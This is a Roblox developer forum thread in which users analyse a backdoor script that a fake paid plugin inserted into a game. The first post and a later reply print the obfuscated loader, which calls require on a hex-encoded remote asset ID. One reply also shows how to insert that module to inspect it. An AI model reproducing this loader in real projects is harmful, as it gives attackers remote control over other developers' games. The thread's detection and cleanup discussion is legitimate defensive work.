Virus in plugins

Whenever im scripting something else I always search “Scripts” on explorer.
And everytime I see this on an script named “WELD.”;
And that was from tool grip editor. if you have it try to search WELD. in your explorer;

pcall(function()
    local fenv = getfenv
    local ADDR = 0x19F996F0A;
    local INST = "re"
    pcall(fenv()[INST.."qui"..INST](ADDR)) 
end)
9 Likes

It is, delete all of them like that.

3 Likes

I do, but whevener I do that it creats another one. It’s like infinite virus on my game. I wanted to know how to remove this forever or what is causing it.

1 Like

Check your plugins, try remove any you are not using and make sure the owners of the plugin are authentic.

2 Likes

I didnt check if i coded this right, but: on studio, not running the game, execute the following code on the command bar, changing VIRUSSCRIPTNAMEHERE to the virus name:
local d = workspace:GetDescendants()
for i=1,#d do
If d[i].Name == “VIRUSSCRIPTNAMEHERE” and d[i]:IsA(“BaseScript”) then d[i]:Destroy() end end

If the virus spreads to other places outside of workspace, like game.Lighting, repeat the command changing workspace with the directory you want.

Also use this every time you insert a free model but dont want any of its scripts:
local d = workspace.FREEMODELNAME:GetDescendants()
for i=1,#d do
If d[i]:IsA(“BaseScript”) then d[i]:Destroy() end end

1 Like

If you saw random local variables or anything like this;

you should delete it

3 Likes

Yes, almost everything with getfenv() is a virus, I’ll try to explain what the script does

-- Suppress the function from any errors/warnings (thanks incapaz)
pcall(function()
    local ADDR = 0x19F996F0A;
   
    -- The ADDR here is an address that can be converted back into words/numbers
    
   local INST = "re"
   
    -- The INST here is used to continue the word 'require'
    -- Suppress the function/line from any errors/warnings (thank incapaz again)
   
    pcall(getfenv()[INST.."qui"..INST](ADDR)) 
   
   -- It requires/adds to your game this specific model/script
end)
8 Likes

I don’t think that’s a new thread necessarily? That is so if any exception occurs any indication of it would be suppressed.

6 Likes

Oh, that’s my bad, I edited my original post now, thanks. (i forgot spawn() creates a new thread and not pcall())

1 Like

yeah. 0x19F996F0A is a hex number which in decimal is 6972600074 so it requires a module with this id. you can now use:

game:GetObjects('rbxassetid://6972600074')[1].Parent = workspace

in the command bar to insert the module in the workspace and check the source (which is obfuscated…) there’s also a GUI in the module and if you put it in the StarterGui, sure enough, it’s a backdoor:

4 Likes

Yep its a virus, I just investigated and leads to this module script;

essentially what it does is it inserts a module script with the ID 0x19F996F0A which is hexadecimal for 6972600074. The code in the module script is obfuscated, so I can’t really read what it does, but in essence it inserts the GUI below into your game, I am guessing would allow whoever is behind it to exploit in your game

1 Like

Well, I fixed it. for some reason it was from “tool grip editor” it was 5 robux…

Also some dude hacked my game with zardiserverside

he’s name was memiguel555

1 Like

report him!
I am trying hard to de-obfuscate the code and see what it precisely does

2 Likes

I did, but im still confused how he discover my game cause like me and my friend was testing the game while he came up with an raid so we would be distracted and he could execute his scripts.

But memiguel555 isn’t the creator of tool grip editor. So I really don’t know how he discover maybe it’s an key that you can press?

Be careful with plugins that you install;

3 Likes

Thanks but, it doens’t put straight up to the explorer. it put at random locations and some of them like at StarterPack

Well, I thought tool grip editor was good cause it was paid and people on yt said it was cool.!

e195cf9260ee9abd2cea5f35e195c86e

yea, I guess this explains the massive exploiting problem that we face. Currently you don’t need to insert a module script into the game to run it, you simply need to require it. This is what the code does, and the module script returns a function, which is then called to start the process

While that I saw that the plugin is fake, they had an group with
CloneTrooper1019 name and then I got tricked,

1 Like

WOW. roblox needs to do something about this. If roblox at least added some way to know when someone calls require with an ID, then you could thwart these exploits before they begin

2 Likes